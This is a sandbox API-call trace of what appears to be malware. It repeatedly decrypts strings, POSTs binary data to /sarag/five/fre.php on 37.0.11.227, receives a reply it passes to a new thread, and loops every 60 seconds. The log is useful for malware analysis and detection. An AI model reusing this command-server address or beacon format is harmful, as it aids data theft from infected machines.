LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.873] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0230.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.873] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0230.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.914] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0231.101] GetProcessHeap () returned 0x690000 [0231.101] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0231.102] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.103] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0231.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.104] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0231.104] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.104] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0231.105] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.105] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0231.105] GetProcessHeap () returned 0x690000 [0231.105] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0231.108] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0231.108] GetProcessHeap () returned 0x690000 [0231.108] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab470 [0231.109] socket (af=2, type=1, protocol=6) returned 0x5f8 [0231.110] connect (s=0x5f8, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0231.140] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0231.140] GetProcessHeap () returned 0x690000 [0231.140] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0231.140] GetProcessHeap () returned 0x690000 [0231.140] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0231.140] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0231.141] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0231.141] GetProcessHeap () returned 0x690000 [0231.141] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0231.141] GetProcessHeap () returned 0x690000 [0231.142] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0231.198] GetProcessHeap () returned 0x690000 [0231.198] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0231.198] GetProcessHeap () returned 0x690000 [0231.198] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0231.199] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0231.200] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0231.200] GetProcessHeap () returned 0x690000 [0231.200] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0231.200] GetProcessHeap () returned 0x690000 [0231.201] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0231.201] send (s=0x5f8, buf=0x6ad508*, len=242, flags=0) returned 242 [0231.201] send (s=0x5f8, buf=0x6aba40*, len=159, flags=0) returned 159 [0231.201] GetProcessHeap () returned 0x690000 [0231.201] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0231.201] recv (in: s=0x5f8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0231.278] GetProcessHeap () returned 0x690000 [0231.278] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0231.278] GetProcessHeap () returned 0x690000 [0231.278] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0231.279] GetProcessHeap () returned 0x690000 [0231.279] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0231.280] GetProcessHeap () returned 0x690000 [0231.280] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0231.280] closesocket (s=0x5f8) returned 0 [0231.281] GetProcessHeap () returned 0x690000 [0231.281] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab470 | out: hHeap=0x690000) returned 1 [0231.281] GetProcessHeap () returned 0x690000 [0231.281] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0231.281] GetProcessHeap () returned 0x690000 [0231.282] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0231.282] GetProcessHeap () returned 0x690000 [0231.282] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0231.282] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc78) returned 0x5f8 [0231.284] Sleep (dwMilliseconds=0xea60) [0231.285] GetProcessHeap () returned 0x690000 [0231.285] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0231.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.286] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0231.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.294] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0231.300] GetProcessHeap () returned 0x690000 [0231.300] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0231.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.301] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0231.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.302] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0231.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.303] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0231.303] GetProcessHeap () returned 0x690000 [0231.303] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0231.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.304] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0231.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.305] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0231.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.306] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0231.306] GetProcessHeap () returned 0x690000 [0231.306] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0231.307] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.308] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0231.308] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.308] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0231.309] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.309] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0231.310] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.310] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0231.310] GetProcessHeap () returned 0x690000 [0231.310] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0231.310] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0231.311] GetProcessHeap () returned 0x690000 [0231.311] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0231.311] GetProcessHeap () returned 0x690000 [0231.312] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0231.315] GetProcessHeap () returned 0x690000 [0231.316] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0231.316] GetProcessHeap () returned 0x690000 [0231.316] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0231.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.317] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0231.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.321] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0231.326] GetProcessHeap () returned 0x690000 [0231.326] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0231.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.326] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0231.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.327] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0231.328] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.328] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0231.328] GetProcessHeap () returned 0x690000 [0231.329] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0231.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.330] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0231.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.330] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0231.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.331] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0231.331] GetProcessHeap () returned 0x690000 [0231.331] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0231.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.332] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0231.333] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.333] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0231.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.334] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0231.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.335] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0231.335] GetProcessHeap () returned 0x690000 [0231.335] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0231.335] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0231.335] GetProcessHeap () returned 0x690000 [0231.335] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0231.335] socket (af=2, type=1, protocol=6) returned 0x5fc [0231.335] connect (s=0x5fc, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0231.364] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0231.364] GetProcessHeap () returned 0x690000 [0231.364] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0231.364] GetProcessHeap () returned 0x690000 [0231.364] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0231.365] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0231.365] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0231.365] GetProcessHeap () returned 0x690000 [0231.365] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0231.365] GetProcessHeap () returned 0x690000 [0231.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0231.366] GetProcessHeap () returned 0x690000 [0231.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0231.366] GetProcessHeap () returned 0x690000 [0231.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0231.367] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0231.367] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0231.367] GetProcessHeap () returned 0x690000 [0231.367] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0231.367] GetProcessHeap () returned 0x690000 [0231.368] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0231.368] send (s=0x5fc, buf=0x6ad508*, len=242, flags=0) returned 242 [0231.368] send (s=0x5fc, buf=0x6aba40*, len=159, flags=0) returned 159 [0231.368] GetProcessHeap () returned 0x690000 [0231.368] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0231.369] recv (in: s=0x5fc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0231.442] GetProcessHeap () returned 0x690000 [0231.443] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0231.443] GetProcessHeap () returned 0x690000 [0231.443] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0231.443] GetProcessHeap () returned 0x690000 [0231.444] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0231.444] GetProcessHeap () returned 0x690000 [0231.444] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0231.445] closesocket (s=0x5fc) returned 0 [0231.445] GetProcessHeap () returned 0x690000 [0231.445] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0231.445] GetProcessHeap () returned 0x690000 [0231.445] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0231.446] GetProcessHeap () returned 0x690000 [0231.446] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0231.446] GetProcessHeap () returned 0x690000 [0231.446] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0231.447] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf14) returned 0x5fc [0231.448] Sleep (dwMilliseconds=0xea60) [0231.449] GetProcessHeap () returned 0x690000 [0231.449] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0231.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.450] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0231.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.455] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0231.460] GetProcessHeap () returned 0x690000 [0231.460] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0231.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.460] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0231.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.461] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0231.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.462] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0231.462] GetProcessHeap () returned 0x690000 [0231.463] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0231.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.463] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0231.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.464] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0231.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.465] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0231.465] GetProcessHeap () returned 0x690000 [0231.465] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0231.466] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.466] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0231.467] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.467] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0231.467] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.468] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0231.468] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.468] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0231.468] GetProcessHeap () returned 0x690000 [0231.468] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0231.469] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0231.469] GetProcessHeap () returned 0x690000 [0231.469] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0231.469] GetProcessHeap () returned 0x690000 [0231.469] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0231.470] GetProcessHeap () returned 0x690000 [0231.470] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0231.470] GetProcessHeap () returned 0x690000 [0231.470] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0231.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.471] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0231.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.475] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0231.480] GetProcessHeap () returned 0x690000 [0231.480] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0231.480] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.481] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0231.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.481] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0231.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.482] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0231.482] GetProcessHeap () returned 0x690000 [0231.483] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0231.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.489] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0231.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.490] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0231.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.490] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0231.490] GetProcessHeap () returned 0x690000 [0231.490] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0231.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.491] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0231.492] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.492] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0231.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.493] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0231.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.494] 